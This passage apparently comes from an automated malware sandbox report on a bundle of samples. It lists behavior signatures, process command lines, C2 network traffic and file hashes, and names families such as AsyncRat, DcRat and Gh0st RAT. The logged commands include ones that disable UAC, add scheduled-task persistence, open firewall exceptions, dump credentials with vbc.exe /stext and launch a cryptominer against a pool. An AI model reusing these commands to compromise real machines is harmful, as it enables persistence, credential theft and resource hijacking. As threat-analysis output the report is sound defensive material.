| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Opus.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\TXPlatforn.exe | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\TXPlatforn.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Opus.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\mediaget.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\aaa.exe | N/A |
| Token: 33 | N/A | C:\Users\Admin\AppData\Roaming\mediaget.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Users\Admin\AppData\Roaming\mediaget.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\___11.19.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\___11.19.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\22.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe
"C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe"
C:\Users\Admin\AppData\Roaming\healastounding.exe
"C:\Users\Admin\AppData\Roaming\healastounding.exe"
C:\Users\Admin\AppData\Roaming\test.exe
"C:\Users\Admin\AppData\Roaming\test.exe"
C:\Users\Admin\AppData\Roaming\gay.exe
"C:\Users\Admin\AppData\Roaming\gay.exe"
C:\Users\Admin\AppData\Roaming\Opus.exe
"C:\Users\Admin\AppData\Roaming\Opus.exe"
C:\Users\Admin\AppData\Roaming\aaa.exe
"C:\Users\Admin\AppData\Roaming\aaa.exe"
C:\Users\Admin\AppData\Roaming\Pluto Panel.exe
"C:\Users\Admin\AppData\Roaming\Pluto Panel.exe"
C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
"C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe"
C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe
"C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe"
C:\Users\Admin\AppData\Roaming\4.exe
"C:\Users\Admin\AppData\Roaming\4.exe"
C:\Users\Admin\AppData\Roaming\22.exe
"C:\Users\Admin\AppData\Roaming\22.exe"
C:\Users\Admin\AppData\Roaming\___11.19.exe
"C:\Users\Admin\AppData\Roaming\___11.19.exe"
C:\Users\Admin\AppData\Local\Temp\svchost.exe
C:\Users\Admin\AppData\Local\Temp\\svchost.exe
C:\Users\Admin\AppData\Roaming\a.exe
"C:\Users\Admin\AppData\Roaming\a.exe"
C:\Users\Admin\AppData\Local\Temp\svchos.exe
C:\Users\Admin\AppData\Local\Temp\\svchos.exe
C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe
"C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe"
C:\Users\Admin\AppData\Roaming\HD____11.19.exe
C:\Users\Admin\AppData\Roaming\HD____11.19.exe
C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
"C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe"
C:\Windows\SysWOW64\TXPlatforn.exe
C:\Windows\SysWOW64\TXPlatforn.exe -auto
C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe
"C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe"
C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe
"C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe"
C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe
"C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe"
C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe
"C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe"
C:\Windows\SysWOW64\TXPlatforn.exe
C:\Windows\SysWOW64\TXPlatforn.exe -acsi
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ping -n 2 127.0.0.1 > nul && del C:\Users\Admin\AppData\Local\Temp\svchost.exe > nul
C:\Users\Admin\AppData\Roaming\3.exe
"C:\Users\Admin\AppData\Roaming\3.exe"
C:\Users\Admin\AppData\Roaming\mediaget.exe
"C:\Users\Admin\AppData\Roaming\mediaget.exe"
C:\Windows\SysWOW64\schtasks.exe
"schtasks.exe" /create /f /tn "DSL Manager" /xml "C:\Users\Admin\AppData\Local\Temp\tmpBC4D.tmp"
C:\Windows\SysWOW64\PING.EXE
ping -n 2 127.0.0.1
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add policy name=Block
C:\Windows\SysWOW64\svchost.exe
C:\Windows\SysWOW64\svchost.exe -k "Ö÷¶¯·ÀÓù·þÎñÄ£¿é"
C:\Windows\SysWOW64\schtasks.exe
"schtasks.exe" /create /f /tn "DSL Manager Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmpC3DC.tmp"
C:\Windows\SysWOW64\svchost.exe
C:\Windows\SysWOW64\svchost.exe -k "Ö÷¶¯·ÀÓù·þÎñÄ£¿é"
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filterlist name=Filter1
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\mediaget.exe" "mediaget.exe" ENABLE
C:\Windows\SysWOW64\Ö÷¶¯·ÀÓù·þÎñÄ£¿é.exe
C:\Windows\system32\Ö÷¶¯·ÀÓù·þÎñÄ£¿é.exe "c:\windows\system32\259440504.txt",MainThread
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhost" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\taskhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "aaa" /sc ONLOGON /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\es\aaa.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "mediaget" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Roaming\mediaget\mediaget.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\hh\explorer.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "mediaget" /sc ONLOGON /tr "'C:\PerfLogs\Admin\mediaget.exe'" /rl HIGHEST /f
C:\Users\Admin\AppData\Roaming\3.exe
"C:\Users\Admin\AppData\Roaming\3.exe"
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=UDP
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holdermail.txt"
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=UDP
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=UDP
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filteraction name=FilteraAtion1 action=block
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add rule name=Rule1 policy=Block filterlist=Filter1 filteraction=FilteraAtion1
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static set policy name=Block assign=y
C:\Windows\Help\Winlogon.exe
C:\Windows\Help\Winlogon.exe
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c del "C:\Users\Admin\AppData\Roaming\22.exe"
C:\Windows\SysWOW64\svchost.exe
C:\Windows\system32\svchost.exe
C:\Users\Admin\AppData\Roaming\aaa.exe
"C:\Users\Admin\AppData\Roaming\aaa.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2456 -s 216
C:\Windows\Cursors\WUDFhosts.exe
C:\Windows\Cursors\WUDFhosts.exe -o pool.usa-138.com:80 -u 4B7yFmYw2qvEtWZDDnZVeY16HHpwTtuYBg6EMn5xdDbM3ggSEnQFDWDHH6cqdEYaPx4iQvAwLNu8NLc21QxDU84GGxZEY7S -p x
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holderwb.txt"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1656 -s 796
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | hackerinvasion.f3322.net | udp |
| MD | 194.180.174.53:80 | | tcp |
| CN | 59.56.110.231:8898 | | tcp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 8.8.8.8:53 | pretorian.ac.ug | udp |
| US | 8.8.8.8:53 | prepepe.ac.ug | udp |
| US | 172.67.74.152:80 | api.ipify.org | tcp |
| RU | 80.87.192.115:80 | | tcp |
| CA | 172.98.92.42:58491 | | tcp |
| US | 8.8.8.8:53 | whatismyipaddress.com | udp |
| US | 8.8.8.8:53 | yabynennet.xyz | udp |
| MD | 194.180.174.53:80 | | tcp |
| US | 104.19.222.79:80 | whatismyipaddress.com | tcp |
| US | 107.178.223.183:81 | yabynennet.xyz | tcp |
| US | 104.19.222.79:443 | whatismyipaddress.com | tcp |
| US | 104.19.222.79:443 | whatismyipaddress.com | tcp |
| US | 8.8.8.8:53 | pretorian.ac.ug | udp |
| HU | 91.219.236.18:80 | 91.219.236.18 | tcp |
| US | 8.8.8.8:53 | gfhhjgh.duckdns.org | udp |
| CO | 179.13.1.253:8050 | gfhhjgh.duckdns.org | tcp |
| US | 8.8.8.8:53 | kazya1.hopto.org | udp |
| MD | 194.180.174.41:80 | | tcp |
| US | 8.8.8.8:53 | 22ssh.com | udp |
| MD | 194.180.174.41:80 | | tcp |
| US | 8.8.8.8:53 | pool.usa-138.com | udp |
| SG | 45.77.45.115:80 | pool.usa-138.com | tcp |
| HU | 91.219.236.148:80 | | tcp |
| CA | 172.98.92.42:58491 | | tcp |
| HU | 91.219.236.148:80 | | tcp |
| RU | 80.87.192.115:80 | | tcp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | files.000webhost.com | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| CO | 179.13.1.253:8050 | gfhhjgh.duckdns.org | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| CA | 172.98.92.42:58491 | | tcp |
| RU | 80.87.192.115:80 | | tcp |
Files
memory/2372-0-0x0000000074091000-0x0000000074092000-memory.dmp
memory/2372-1-0x0000000074090000-0x000000007463B000-memory.dmp
memory/2372-2-0x0000000074090000-0x000000007463B000-memory.dmp
\Users\Admin\AppData\Roaming\healastounding.exe
| MD5 | 6fb798f1090448ce26299c2b35acf876 |
| SHA1 | 451423d5690cffa02741d5da6e7c45bc08aefb55 |
| SHA256 | b4f86ff48c5f6b01e0ad4543fb78e0435e81f3ec2aaca89866862157c0dacf4f |
| SHA512 | 9cc2421a2f3ab01d15be62a848947b03f1a8212cfd923573cf70f8c10bd8d124aee3b251828834236af291ea12450ac2580a712e53a022ce11b4d71b0357d8c3 |
memory/2540-14-0x0000000074090000-0x000000007463B000-memory.dmp
\Users\Admin\AppData\Roaming\gay.exe
| MD5 | 8eedc01c11b251481dec59e5308dccc3 |
| SHA1 | 24bf069e9f2a1f12aefa391674ed82059386b0aa |
| SHA256 | 0184983a425fef55d46b7e0eb729a245730ee26414ebe4b155917c0124a19c2d |
| SHA512 | 52388313b21f14aa69c8b37e0fe0b73f66aa92f08651a16c820aae65d341dc1af6b48f3c8d4f657ac990eeaf4b9a01ae769bca4d3625550011708697d22b69cc |
C:\Users\Admin\AppData\Roaming\test.exe
| MD5 | 7e50b292982932190179245c60c0b59b |
| SHA1 | 25cf641ddcdc818f32837db236a58060426b5571 |
| SHA256 | a8dde4e60db080dfc397d7e312e7e9f18d9c08d6088e8043feeae9ab32abdbb8 |
| SHA512 | c6d422d9fb115e1b6b085285b1d3ca46ed541e390895d702710e82a336f4de6cc5c9183f8e6ebe35475fcce6def8cc5ffa8ee4a61b38d7e80a9f40789688b885 |
C:\Users\Admin\AppData\Roaming\aaa.exe
| MD5 | 860aa57fc3578f7037bb27fc79b2a62c |
| SHA1 | a14008fe5e1eb88bf46266de3d5ee5db2e0a722b |
| SHA256 | 5430565c4534b482c7216a0ae75d04e201ee0db0386682c0c010243083c28d29 |
| SHA512 | 6639b3e2594e554c7fa811f22e1c514474d34220155b4c989ad8716db1a0aea65894aa23d78c12a4618c57312da00353a77dd8e6c6bdd927bf865f2e98aff8f1 |
C:\Users\Admin\AppData\Roaming\Pluto Panel.exe
| MD5 | ed666bf7f4a0766fcec0e9c8074b089b |
| SHA1 | 1b90f1a4cb6059d573fff115b3598604825d76e6 |
| SHA256 | d1330d349bfbd3aea545fa08ef63339e82a3f4d04e27216ecc4c45304f079264 |
| SHA512 | d0791eaa9859d751f946fd3252d2056c29328fc97e147a5234a52a3728588a3a1aaa003a8e32863d338ebdca92305c48b6fa12ca1e620cf27460bf091c3b6d49 |
\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
| MD5 | 0fd7de5367376231a788872005d7ed4f |
| SHA1 | 658e4d5efb8b14661967be2183cc60e3e561b2b6 |
| SHA256 | 9083992637e90e412e6f4e77331eb69ee8db821c54bbc38533e0f889cc4ca9dd |
| SHA512 | 522d5be2803fbce0d12c325cc2ef1e3a92cec03aeba7d1164530093ad58caecd827dd557ca3c182a66c6667150e731de37bb552d19425f96cc78fe3423e1a863 |
\Users\Admin\AppData\Roaming\4.exe
| MD5 | e6dace3f577ac7a6f9747b4a0956c8d7 |
| SHA1 | 86c71169025b822a8dfba679ea981035ce1abfd1 |
| SHA256 | 8b4b846fe1023fa173ab410e3a5862a4c09f16534e14926878e387092e7ffb63 |
| SHA512 | 1c8554d3d9a1b1509ba1df569ede3fb7a081bef84394c708c4f1a2fb8779f012c74fbf6de085514e0c8debb5079cc23c6c6112b95bf2f0ab6a8f0bd156a3e268 |
C:\Users\Admin\AppData\Roaming\22.exe
| MD5 | dbf9daa1707b1037e28a6e0694b33a4b |
| SHA1 | ddc1fcec1c25f2d97c372fffa247969aa6cd35ef |
| SHA256 | a604a3ff78644533fac5ee9f198e9c5f2fa1ae2a5828186367a9e00935cff6b6 |
| SHA512 | 145b606ffd58554050ff8712ddb38c1c66dd5f33ea15fd48474e1c165b2c0348d2413e16c7ad07ff1c65ce71e2be23e3758e6d48c4f2454d5407982119706bfd |
\Users\Admin\AppData\Roaming\___11.19.exe
| MD5 | a071727b72a8374ff79a695ecde32594 |
| SHA1 | b2aba60b3332d6b8f0a56cea310cdc2bdb4f9ffc |
| SHA256 | 8ecdfe60eacb5bf647ae69bcbc41dd727ea3089e92b4b08ebca3a8d162e50745 |
| SHA512 | 854b93fb6b9bf0fe4caef5572935852ce8becf2bc7bd41b192a4b3cefb7854a2405c6c0c06bbdd4e1026ff9440ec753911dcc935fe68118e322614c1b918e400 |
memory/2540-100-0x00000000057C0000-0x0000000005B82000-memory.dmp
memory/316-103-0x0000000000400000-0x00000000007C2000-memory.dmp
memory/2940-108-0x0000000010000000-0x00000000101B6000-memory.dmp
C:\Windows\SysWOW64\TXPlatforn.exe
| MD5 | a4329177954d4104005bce3020e5ef59 |
| SHA1 | 23c29e295e2dbb8454012d619ca3f81e4c16e85a |
| SHA256 | 6156d003d54dcf2ee92f21bd6e7a6a7f91730bd2804381260bcabe465abe6ddd |
| SHA512 | 81e9d456a4abfc7cd9e0943d4a0ce15523362c3179f3368381d1d7974f80a9f9113b5404b96e67e91684e0ea1895b7d0073e4c48d0bfc4fd0244b1af6acf0208 |
memory/2940-107-0x0000000010000000-0x00000000101B6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe
| MD5 | 78d40b12ffc837843fbf4de2164002f6 |
| SHA1 | 985bdffa69bb915831cd6b81783aef3ae4418f53 |
| SHA256 | 308a15dabdc4ce6b96dd54954a351d304f1fcb59e8c93221ba1c412bcdfd1c44 |
| SHA512 | c6575e1771d37ded4089d963bea95deac78b329ed555c991d7c559ee1970dd0887a965e88c09981529adc9c25df5cfd3d57e3dce6724da1f01f1198f0f460b79 |
memory/2540-126-0x0000000074090000-0x000000007463B000-memory.dmp
memory/2940-105-0x0000000010000000-0x00000000101B6000-memory.dmp
C:\Users\Admin\AppData\Roaming\a.exe
| MD5 | 52cfd35f337ca837d31df0a95ce2a55e |
| SHA1 | 88eb919fa2761f739f02a025e4f9bf1fd340b6ff |
| SHA256 | 5975e737584ddf2601c02e5918a79dad7531df0e13dca922f0525f66bec4b448 |
| SHA512 | b584282f6f5396c3bbed7835be67420aa14d11b9c42a88b0e3413a07a6164c22d6f50d845d05f48cb95d84fd9545d0b9e25e581324a08b3a95ced9f048d41d73 |
memory/1808-138-0x0000000005130000-0x00000000066DA000-memory.dmp
C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe
| MD5 | 8f1c8b40c7be588389a8d382040b23bb |
| SHA1 | bef5209ae90a3bd3171e1e0be4e8148c4ccd8a6a |
| SHA256 | ed58ffee46a583c177c792b56c9fc20ccd9509d125f2e3fc90c4f48de7e2c2a1 |
| SHA512 | 9192b6f2f8320a728c445f9cd6e6d66495ad0ebebd7ff193dc09ee8ae57b3933c1b75dc208e7d638db273cb9d31b4ca24ee7bfd9729ff0cdbf432d72bb322b1f |
C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe
| MD5 | 870d6e5aef6dea98ced388cce87bfbd4 |
| SHA1 | 2d7eee096d38d3c2a8f12fcba0a44b4c4da33d54 |
| SHA256 | 6d50833895b2e3eb9d6f879a6436660127c270b6a516cda0253e56a3d8b7fba0 |
| SHA512 | 0d55ab28b2f80136af121b870b7503551d87bbeb2848cf9a32540006cac9a5e346d9fcce2bf1223a22927f72a147b81487533a10b91373d4fa4429d6159fd566 |
memory/1656-171-0x0000000000400000-0x0000000000438000-memory.dmp
memory/620-169-0x0000000000400000-0x0000000000424000-memory.dmp
memory/620-167-0x0000000000400000-0x0000000000424000-memory.dmp
memory/316-162-0x0000000000400000-0x00000000007C2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\HD_X.dat
| MD5 | 696a7236e14e7407b5023681fba1d690 |
| SHA1 | 43c550a8ab63b5f5a2a2622e5f614c4aaeeaf78e |
| SHA256 | af034321362311726b4f39f658d691b7cf2ddf6eccd13f771532abde387f720a |
| SHA512 | 4582231dde50799d1925ba884e6e9d4bfde0a7ca56ee0f9d7bb0ccea18cbb73bda8bdf4de387537ade3d0be5c496f5748346c91806da72f7bf2e0fd814a6d0a0 |
memory/2188-160-0x0000000000400000-0x0000000000495000-memory.dmp
memory/1808-140-0x0000000005130000-0x00000000066DA000-memory.dmp
memory/2000-139-0x0000000000400000-0x00000000019AA000-memory.dmp
memory/1224-147-0x0000000000400000-0x000000000044F000-memory.dmp
memory/1224-145-0x0000000000400000-0x000000000044F000-memory.dmp
memory/1224-144-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
C:\Users\Admin\AppData\Roaming\HD____11.19.exe
| MD5 | b14120b6701d42147208ebf264ad9981 |
| SHA1 | f3cff7ac8e6c1671d2c3387648e54f80957196de |
| SHA256 | d987bd57582a22dfc65901ff256eda635dc8dad598c93b200002130b87fcfd97 |
| SHA512 | 27a066b9d842acd7b1e0ca1dd045a9262b0d0a00c180eedeebeb9d3091925b184186fc3a1d2df28ae4c55626febe6abf6fdb5e26d45fd1a2968d57540e7cf29b |
C:\Users\Admin\AppData\Local\Temp\svchos.exe
| MD5 | 3b377ad877a942ec9f60ea285f7119a2 |
| SHA1 | 60b23987b20d913982f723ab375eef50fafa6c70 |
| SHA256 | 62954fdf65e629b39a29f539619d20691332184c6b6be5a826128a8e759bfa84 |
| SHA512 | af3a71f867ad9d28772c48b521097f9bf8931eb89fd2974e8de10990241419a39ddc3c0b36dd38aac4fdf14e1f0c5e228692618e93adce958d5b5dab8940e46f |
memory/2372-88-0x0000000074090000-0x000000007463B000-memory.dmp
memory/2540-61-0x0000000074090000-0x000000007463B000-memory.dmp
C:\Users\Admin\AppData\Roaming\Opus.exe
| MD5 | 759185ee3724d7563b709c888c696959 |
| SHA1 | 7c166cc3cbfef08bb378bcf557b1f45396a22931 |
| SHA256 | 9384798985672c356a8a41bf822443f8eb0d3747bfca148ce814594c1a894641 |
| SHA512 | ed754357b1b995de918af21fecd9d1464bdea6778f7ab450a34e3aae22ba7eebc02f2442af13774abfdf97954e419ec9e356b54506c7e3bf12e3b76ee882fa2c |
memory/2540-12-0x0000000074090000-0x000000007463B000-memory.dmp
memory/2364-216-0x0000000000A50000-0x0000000000A62000-memory.dmp
memory/316-219-0x0000000000400000-0x00000000007C2000-memory.dmp
memory/2272-229-0x0000000010000000-0x00000000101B6000-memory.dmp
memory/2272-235-0x0000000010000000-0x00000000101B6000-memory.dmp
C:\Users\Admin\AppData\Roaming\3.exe
| MD5 | 748a4bea8c0624a4c7a69f67263e0839 |
| SHA1 | 6955b7d516df38992ac6bff9d0b0f5df150df859 |
| SHA256 | 220d8f8ff82d413c81bd02dfa001e1c478e8fbea44bad24f21b3a5284e15632e |
| SHA512 | 5fcdfddce3cc2e636001ed08c5f2f7590aadaa37c091f7ba94e519d298e284362721f1859c6ffbf064ae23e05d4e0e9754b515396812fbe9f9028497396799fd |
memory/2000-248-0x0000000005FC0000-0x0000000006382000-memory.dmp
memory/2188-244-0x0000000000400000-0x0000000000495000-memory.dmp
memory/1656-242-0x0000000000400000-0x0000000000438000-memory.dmp
memory/2216-217-0x0000000000400000-0x0000000000625000-memory.dmp
memory/2272-271-0x0000000010000000-0x00000000101B6000-memory.dmp
memory/2000-270-0x0000000005FC0000-0x0000000006382000-memory.dmp
memory/2000-267-0x0000000005FC0000-0x0000000006382000-memory.dmp
memory/2000-263-0x0000000005FC0000-0x0000000006382000-memory.dmp
memory/2000-259-0x0000000005FC0000-0x0000000006382000-memory.dmp
memory/2000-256-0x0000000005FC0000-0x0000000006382000-memory.dmp
memory/2000-254-0x0000000005FC0000-0x0000000006382000-memory.dmp
memory/2000-250-0x0000000005FC0000-0x0000000006382000-memory.dmp
memory/2168-275-0x0000000000100000-0x0000000000194000-memory.dmp
C:\ProgramData\kaosdma.txt
| MD5 | 2c807857a435aa8554d595bd14ed35d1 |
| SHA1 | 9003a73beceab3d1b1cd65614347c33117041a95 |
| SHA256 | 3c4fae56f61b7cdf09709c2aaf65ca47d3bf9077b1e5eb0eb1e6c5c34923eb9b |
| SHA512 | 95c6fa9f5b342ef34d896f083700ee12d55723e24aff42805bac5c1aa73f07d0db4f9d435d31a61da187edc2336252dfb38529b3f2b1d2039aa2a8e65d64a7a9 |
memory/2168-292-0x00000000002E0000-0x00000000002EC000-memory.dmp
memory/2168-293-0x0000000000300000-0x000000000030A000-memory.dmp
memory/2168-295-0x0000000000310000-0x000000000031C000-memory.dmp
memory/2168-294-0x00000000002F0000-0x00000000002FC000-memory.dmp
memory/1808-296-0x0000000005130000-0x00000000066DA000-memory.dmp
memory/2000-299-0x0000000000400000-0x00000000019AA000-memory.dmp
memory/1656-304-0x0000000000400000-0x0000000000434000-memory.dmp
memory/620-303-0x0000000000400000-0x0000000000420000-memory.dmp
memory/2188-302-0x0000000000400000-0x0000000000491000-memory.dmp
memory/1224-301-0x0000000000400000-0x000000000044F000-memory.dmp
memory/1808-305-0x0000000005130000-0x00000000066DA000-memory.dmp
memory/620-319-0x0000000000400000-0x0000000000420000-memory.dmp
memory/620-318-0x0000000000400000-0x0000000000424000-memory.dmp
memory/2700-320-0x0000000000400000-0x000000000041B000-memory.dmp
memory/2700-321-0x0000000000400000-0x000000000041B000-memory.dmp
memory/548-354-0x0000000001CA0000-0x0000000002220000-memory.dmp
memory/604-355-0x000000013F610000-0x000000013FB90000-memory.dmp
memory/548-380-0x0000000001CA0000-0x0000000002220000-memory.dmp
memory/604-382-0x000000013F610000-0x000000013FB90000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-12-07 03:49
Reported
2024-12-07 03:49
Platform
win10v2004-20241007-en
Max time kernel
2s
Max time network
27s
Command Line
Signatures
AsyncRat
Asyncrat family
Blackmoon family
Blackmoon, KrBanker
DcRat
Dcrat family
Detect Blackmoon payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect PurpleFox Rootkit
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Fickerstealer
Fickerstealer family
Gh0st RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Gh0strat
Gh0strat family
Njrat family
Oski
Oski family
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
